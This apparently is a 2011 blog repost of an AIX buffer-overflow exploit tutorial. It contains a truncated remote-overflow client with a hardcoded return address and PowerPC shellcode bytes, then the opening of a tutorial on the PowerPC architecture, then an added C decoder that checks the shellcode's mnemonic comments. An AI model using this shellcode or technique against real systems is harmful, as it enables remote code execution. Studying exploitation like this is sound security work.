Wednesday, February 2, 2011

AIX Exploit

/* client.c - remote overflow demo
 *
 * 2004.06.16
 * san@nsfocus.com
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

// It needs adjust.
#define RET 0x2ff22d88;

unsigned char sh_Buff[] =
    "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
    "\x40\x82\xff\xfd" /* bnel */
    "\x7e\xa8\x02\xa6" /* mflr r21 */
    "\x3a\xc0\x01\xff" /* lil r22,0x1ff */
    "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
    "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
    "\x7e\xa9\x03\xa6" /* mtctr r21 */
    "\x4e\x80\x04\x20" /* bctr */
    "\x05\x82\x53\xa0"...

Tutorial Exploiting AIX (Buffer Overflows)

Author: san (san_at_xfocus.org)

--[ 1 - Familiar with the PowerPC architecture (32-bit)

The PowerPC architecture is a Reduced Instruction Set Computer (RISC) architecture with over two hundred defined instructions. PowerPC is RISC in that most instructions execute in a single cycle and typically perform a single operation (such as loading storage into a register, or storing a register to memory). PowerPC instructions have a uniform length of 32 bits, and there are almost 12 instruction formats, which reflect 5 primary classes of instructions:

- branch instructions,
- fixed-point instructions,
- floating-point instructions,
- load and store instructions,
- processor control instructions.

PowerPC's application-level registers are broken into three...
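As an added example that is not part of the original post or san's code, the following decoder (hypothetical names ppc_word, ppc_mnemonic and ppc_simm) walks the first eight words of sh_Buff above in fixed 4-byte steps, splits each word into the opcode and register fields the tutorial's instruction formats define, and recovers the mnemonics the shellcode comments claim. It only covers the forms that occur in those eight words, so it is a way to check a captured payload's annotations against the actual encodings rather than a general disassembler.

```c
/* Added example, not from the original post: decode the first eight
 * 32-bit PowerPC words of sh_Buff and recover their mnemonics. Only
 * the forms present there are handled (D-form addi, B-form bc,
 * XL-form bcctr, opcode-31 X/XO/XFX forms); others report "unknown". */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* First 32 bytes of sh_Buff from the post, treated purely as data. */
static const unsigned char sample[] =
    "\x7e\x94\xa2\x79" "\x40\x82\xff\xfd" "\x7e\xa8\x02\xa6" "\x3a\xc0\x01\xff"
    "\x3a\xf6\xfe\x2d" "\x7e\xb5\xba\x14" "\x7e\xa9\x03\xa6" "\x4e\x80\x04\x20";
/* Instructions are big-endian and exactly four bytes long: build the word. */
uint32_t ppc_word(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
/* Field extractors; PowerPC numbers bit 0 as the most significant bit. */
#define OPCD(w) ((w) >> 26)             /* bits 0-5: primary opcode        */
#define RD(w)   (((w) >> 21) & 0x1F)    /* bits 6-10: rD / rS / BO         */
#define RA(w)   (((w) >> 16) & 0x1F)    /* bits 11-15: rA / BI             */
#define RB(w)   (((w) >> 11) & 0x1F)    /* bits 16-20: rB                  */
#define XO(w)   (((w) >> 1) & 0x3FF)    /* bits 21-30: extended opcode     */
#define LK(w)   ((w) & 1)               /* bit 31: link bit, or Rc on xor  */
#define SPR(w)  (RA(w) | (RB(w) << 5))  /* SPR number, 5-bit halves swapped */
int16_t ppc_simm(uint32_t w) { return (int16_t)(w & 0xFFFF); } /* D-form immediate */

const char *ppc_mnemonic(uint32_t w) {
    switch (OPCD(w)) {
    case 14: return RA(w) == 0 ? "li" : "addi";                 /* AIX spells these lil/cal */
    case 16: if ((RD(w) & 0x1C) == 4 && RA(w) == 2) return LK(w) ? "bnel" : "bne"; return "bc";
    case 19: if (XO(w) == 528 && RD(w) == 20) return LK(w) ? "bctrl" : "bctr"; break;
    case 31:
        if (XO(w) == 316) return LK(w) ? "xor." : "xor";       /* Rc shares bit 31 */
        if ((XO(w) & 0x1FF) == 266) return "add";               /* AIX cax; bit 21 is OE */
        if (XO(w) == 339) return SPR(w) == 8 ? "mflr" : "mfspr";
        if (XO(w) == 467) return SPR(w) == 9 ? "mtctr" : "mtspr";
    }
    return "unknown";
}
/* Walk the buffer in fixed 4-byte steps and print a listing. */
int main(void) {
    for (size_t i = 0; i + 4 <= sizeof sample - 1; i += 4) {
        uint32_t w = ppc_word(sample + i);
        printf("%04zx: %08x  %-6s", i, w, ppc_mnemonic(w));
        if (OPCD(w) == 14) printf(" r%u,r%u,%d", (unsigned)RD(w), (unsigned)RA(w), ppc_simm(w));
        printf("\n");
    }
    return 0;
}
```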
